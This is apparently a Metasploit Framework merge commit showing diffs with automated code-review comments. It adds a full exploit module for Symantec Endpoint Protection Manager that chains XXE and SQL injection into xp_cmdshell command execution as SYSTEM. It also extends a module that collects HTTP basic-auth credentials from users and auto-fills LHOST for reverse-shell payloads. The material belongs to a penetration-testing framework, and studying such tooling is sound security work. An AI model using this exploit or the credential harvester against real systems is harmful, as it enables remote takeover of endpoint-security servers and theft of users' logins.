Merge branch 'master' of github.com:rapid7/metasploit-framework

bug/bundler_fix
David Maloney 2014-02-25 15:56:24 -06:00
commit f229932d16
7 changed files with 146 additions and 7 deletions


@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary
)
# report the external port as being open
if inside_workspace_boundary(external_address)
if inside_workspace_boundary?(external_address)
report_service(
:host => external_address,
:port => external_port,


@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary
)
# also report its external address as alive
if inside_workspace_boundary(external_address)
if inside_workspace_boundary?(external_address)
report_host(
:host => external_address,
:state => Msf::HostState::Alive


@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("#{external_addr} - #{int}/#{protocol} #{state} because of code #{result} response") if (datastore['DEBUG'])
end
if inside_workspace_boundary(external_addr)
if inside_workspace_boundary?(external_addr)
report_service(
:host => external_addr,
:port => int,


@ -39,7 +39,8 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]),
OptString.new('REALM', [ true, "The authentication realm you'd like to present.", "Secure Site" ])
OptString.new('REALM', [ true, "The authentication realm you'd like to present.", "Secure Site" ]),
OptString.new('RedirectURL', [ false, "The page to redirect users to after they enter basic auth creds" ])
], self.class)
end
@ -73,9 +74,14 @@ class Metasploit3 < Msf::Auxiliary
)
print_good("#{cli.peerhost} - Credential collected: \"#{user}:#{pass}\" => #{req.resource}")
send_not_found(cli)
if datastore['RedirectURL']
print_status("Redirecting client #{cli.peerhost} to #{datastore['RedirectURL']}")
send_redirect(cli, datastore['RedirectURL'])
else
print_status("Sending 401 to client")
send_not_found(cli)
end
else
print_status("Sending 401 to client #{cli.peerhost}")
response = create_response(401, "Unauthorized")
response.headers['WWW-Authenticate'] = "Basic realm=\"#{@realm}\""
cli.send_response(response)
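Review bot: The status message on the no-redirect branch, `print_status("Sending 401 to client")`, does not match what the next line does: `send_not_found(cli)` sends the not-found response rather than a 401, and the message also drops the `cli.peerhost` that the sibling message further down includes. Changing it to `print_status("Sending 404 to client #{cli.peerhost}")` keeps the log honest, assuming send_not_found emits a 404 as its name suggests (its body is not on the page). The new option name `RedirectURL` also departs from the upper-case convention the adjacent options (`SRVPORT`, `REALM`) follow; `REDIRECTURL` with a matching `datastore['REDIRECTURL']` in the handler would be consistent. The enclosing request handler starts and ends outside the hunk.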

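--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,124 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+include REXML
+include Msf::Exploit::CmdStagerVBS
+include Msf::Exploit::Remote::HttpClient
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Symantec Endpoint Protection Manager Remote Command Execution',
+'Description' => %q{
+This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager
+versions 11.0, 12.0 and 12.1. When supplying a specially crafted XXE request an attacker
+can reach SQL injection affected components. As xp_cmdshell is enabled in the included
+database instance, it's possible to execute arbitrary system commands on the remote system
+with SYSTEM privileges.
+},
+'Author' =>
+[
+'Stefan Viehbock', # Discovery
+'Chris Graham', # PoC exploit
+'xistence <xistence[at]0x90.nl>' # Metasploit module
+],
+'License' => MSF_LICENSE,
+'References' =>
+[
+[ 'CVE', '2013-5014' ],
+[ 'CVE', '2013-5015' ],
+[ 'EDB', '31853'],
+[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ]
+],
+'Arch' => ARCH_X86,
+'Platform' => 'win',
+'Targets' =>
+[
+['Windows VBS Stager', {}]
+],
+'Privileged' => true,
+'DisclosureDate' => 'Feb 24 2014',
+'DefaultTarget' => 0))
+register_options(
+[
+Opt::RPORT(9090),
+OptString.new('TARGETURI', [true, 'The base path', '/'])
+], self.class)
+end
+def check
+res = send_request_cgi(
+{
+'uri' => normalize_uri(target_uri.path),
+'method' => 'GET',
+})
+if res && res.code == 200 && res.body =~ /Symantec Endpoint Protection Manager/ && res.body =~ /1995 - 2013 Symantec Corporation/
+return Exploit::CheckCode::Appears
+end
+Exploit::CheckCode::Safe
+end
+def exploit
+print_status("#{peer} - Sending payload")
+# Execute the cmdstager, max length of the commands is ~3950
+execute_cmdstager({:linemax => 3950})
+end
+def execute_command(cmd, opts = {})
+# Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML.
+command = "0x#{Rex::Text.to_hex("cmd /c #{cmd}", '')}"
+# Generate random 'xx032xxxx' sequence number.
+seqnum = "#{rand_text_numeric(2)}032#{rand_text_numeric(4)}"
+soap = soap_request(seqnum, command)
+post_data = Rex::MIME::Message.new
+post_data.add_part(soap, "text/xml", nil, "form-data; name=\"Content\"")
+xxe = post_data.to_s
+res = send_request_cgi(
+{
+'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
+'method' => 'POST',
+'vars_get' => { 'ActionType' => 'ConsoleLog' },
+'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+'data' => xxe,
+})
+if res and res.body !~ /ResponseCode/
+fail_with(Failure::Unknown, "#{peer} - Something went wrong.")
+end
+end
+def soap_request(seqnum, command)
+randpayload = rand_text_alpha(8+rand(8))
+randxxe = rand_text_alpha(8+rand(8))
+entity = "<!ENTITY #{randpayload} SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?"
+entity << "ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >"
+xml = Document.new
+xml.add(DocType.new('sepm', "[ METASPLOIT ]"))
+xml.add_element("Request")
+xxe = xml.root.add_element(randxxe)
+xxe.text = "PAYLOAD"
+xml_s = xml.to_s
+xml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding
+xml_s.gsub!(/PAYLOAD/, "&#{randpayload};") # To avoid html encoding
+xml_s
+end
+end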
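Review bot: A nil response from send_request_cgi in execute_command is silently treated as success: `if res and res.body !~ /ResponseCode/` only raises when a body arrived, so a timeout or dropped connection never reaches fail_with and the cmdstager keeps issuing commands. If a missing response is not an expected outcome of this request, `fail_with(Failure::Unknown, "#{peer} - Something went wrong.") unless res && res.body =~ /ResponseCode/` covers both cases; if it is expected, a `vprint_status("#{peer} - No response received")` in a nil branch would at least make it visible. In either form `&&` should replace `and`, whose low precedence is a known trap in conditions. `include REXML` at the class top pulls the whole REXML namespace into the module for two uses; qualifying them as `REXML::Document` and `REXML::DocType` in soap_request avoids that. execute_command and soap_request also carry no header comment saying what they build and return; a one-line YARD `# @return [String] the XML body handed to the multipart request` on soap_request would help the next maintainer.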


@ -114,9 +114,15 @@ cmd = rest.pop.downcase
options = {}
rest.each do |x|
k,v = x.split("=", 2)
options[k] = v.to_s
options[k.upcase] = v.to_s
end
# if LHOST is not set auto set it
if payload_name =~ /[\_\/]reverse/ and options['LHOST'].nil?
options['LHOST'] = Rex::Socket.source_address
end
payload.datastore.merge! options
if (cmd =~ /^(p|y|r|d|c|h|j|x|b|v|w|n)$/)
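Review bot: LHOST is filled in from `Rex::Socket.source_address` without telling the user, so a payload can be generated for an address the operator never chose (whichever local address that helper resolves by default; its implementation is not on the page, so verify what it picks); printing the chosen value next to the assignment would make the fallback visible. The same silent fallback is repeated in the last hunk of this commit (`datastore['LHOST'] = Rex::Socket.source_address`) and should carry the same notice. The condition also uses `and`, whose low precedence is a known trap; `if payload_name =~ /[_\/]reverse/ && options['LHOST'].nil?` is the usual form, and the `\_` escape is redundant inside a character class. The surrounding option-parsing code starts and ends outside the hunk.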


@ -152,6 +152,9 @@ require 'msf/core/payload_generator'
k,v = x.split('=', 2)
datastore[k.upcase] = v.to_s
end
if opts[:payload].to_s =~ /[\_\/]reverse/ and datastore['LHOST'].nil?
datastore['LHOST'] = Rex::Socket.source_address
end
end
if opts[:payload].nil? # if no payload option is selected assume we are reading it from stdin